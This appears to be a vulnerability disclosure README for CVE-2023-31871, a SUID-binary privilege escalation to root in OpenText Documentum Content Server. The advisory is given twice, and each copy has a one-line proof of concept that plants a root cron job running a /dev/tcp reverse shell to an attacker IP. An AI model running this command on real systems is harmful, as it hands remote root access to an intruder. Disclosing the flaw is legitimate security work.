picar0jsu/CVE-2023-31871

## CVE-2023-31871
[Suggested description]
OpenText Documentum Content Server before 23.2 has a flaw that allows
for privilege escalation from a non-privileged Documentum user to root.
The software comes prepackaged with a root owned SUID binary
dm_secure_writer. The binary has security controls in place preventing
creation of a file in a non-owned directory, or as the root user.
However, these controls can be carefully bypassed to allow for an
arbitrary file write as root.

------------------------------------------

[Vulnerability Type]
Local Privilege Escalation via SetUID Binary

------------------------------------------

[Vendor of Product]
OpenText

------------------------------------------

[Affected Product Code Base]
Documentum Content Server - Before 23.2, Fixed in 23.2.

------------------------------------------

[Affected Component]
The affected SUID is dm_secure_writer.

------------------------------------------

[Attack Type]
Local

------------------------------------------

[Impact Code execution]
true

------------------------------------------

[Impact Escalation of Privileges]
true

------------------------------------------

[Attack Vectors]
Local access as the Documentum Content Server user to the machine with the affected software.

------------------------------------------

[Reference]
https://www.opentext.com/about/security-acknowledgements

------------------------------------------

[Has vendor confirmed or acknowledged the vulnerability?]
true

------------------------------------------

[POC]
ln -s /<Documentum Home>/dm_secure_writer /tmp/secure_writer; echo "bash -i >& /dev/tcp/<ATTACKER IP>/4444 0>&1">/tmp/test.sh; chmod +x /tmp/test.sh; echo "* * * * * root /tmp/test.sh" | /tmp/secure_writer test -1 /etc/cron.d/evilcron

------------------------------------------

[Discoverer]
@picar0jsu
	[Suggested description]
	OpenText Documentum Content Server before 23.2 has a flaw that allows
	for privilege escalation from a non-privileged Documentum user to root.
	The software comes prepackaged with a root owned SUID binary
	dm_secure_writer. The binary has security controls in place preventing
	creation of a file in a non-owned directory, or as the root user.
	However, these controls can be carefully bypassed to allow for an
	arbitrary file write as root.

	------------------------------------------

	[Vulnerability Type]
	Local Privilege Escalation via SetUID Binary

	------------------------------------------

	[Vendor of Product]
	OpenText

	------------------------------------------

	[Affected Product Code Base]
	Documentum Content Server - Before 23.2, Fixed in 23.2.

	------------------------------------------

	[Affected Component]
	The affected SUID is dm_secure_writer.

	------------------------------------------

	[Attack Type]
	Local

	------------------------------------------

	[Impact Code execution]
	true

	------------------------------------------

	[Impact Escalation of Privileges]
	true

	------------------------------------------

	[Attack Vectors]
	Local access as the Documentum Content Server user to the machine with the affected software.

	------------------------------------------

	[Reference]
	https://www.opentext.com/about/security-acknowledgements

	------------------------------------------

	[Has vendor confirmed or acknowledged the vulnerability?]
	true

	------------------------------------------

	[POC]
	ln -s /<Documentum Home>/dm_secure_writer /tmp/secure_writer; echo "bash -i >& /dev/tcp/<ATTACKER IP>/4444 0>&1">/tmp/test.sh; chmod +x /tmp/test.sh; echo "* * * * * root /tmp/test.sh" \| /tmp/secure_writer test -1 /etc/cron.d/evilcron

	------------------------------------------

	[Discoverer]
	@picar0jsu